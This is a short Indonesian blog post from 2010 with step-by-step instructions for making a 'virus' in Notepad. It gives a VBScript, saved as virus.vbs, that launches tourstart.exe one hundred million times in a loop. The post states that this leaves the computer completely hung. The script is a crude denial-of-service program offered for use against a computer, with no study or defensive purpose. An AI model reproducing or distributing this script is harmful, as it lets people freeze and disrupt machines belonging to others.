Membuat virus bukanlah merupakan hal yang sulit. Karena, kita dapat membuatnya dengan notepad. Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.
Let`s Begin!
Langkah-langkah:
1. buka notepad
2. copy script ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
3. Save notepad dengan nama virus.vbs
4. Jalankan file tersebut dan lihat, komputer anda akan dipenuhi oleh 100000000
tourstart yang akan memenuhi layar anda, dan akan membuat komputer hang total
sebelum anda mendelete semuanya.
Membuat Virus dengan Simple
Wednesday, May 5, 2010
Diposkan oleh
Unknown
di
1:55 PM
- Two clicks for more privacy: The Facebook Like button will be enabled once you click here. Activating the button already sends data to Facebook – see i.not connected to Facebook
- Two clicks for more privacy: The Google+ button will be enabled once you click here. Activating the button already sends data to Google – see i.not connected to Google+
- Two clicks for more privacy: The Tweet this button will be enabled once you click here. Activating the button already sends data to Twitter – see i.not connected to Twitter
Label:
Tips - Trik
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment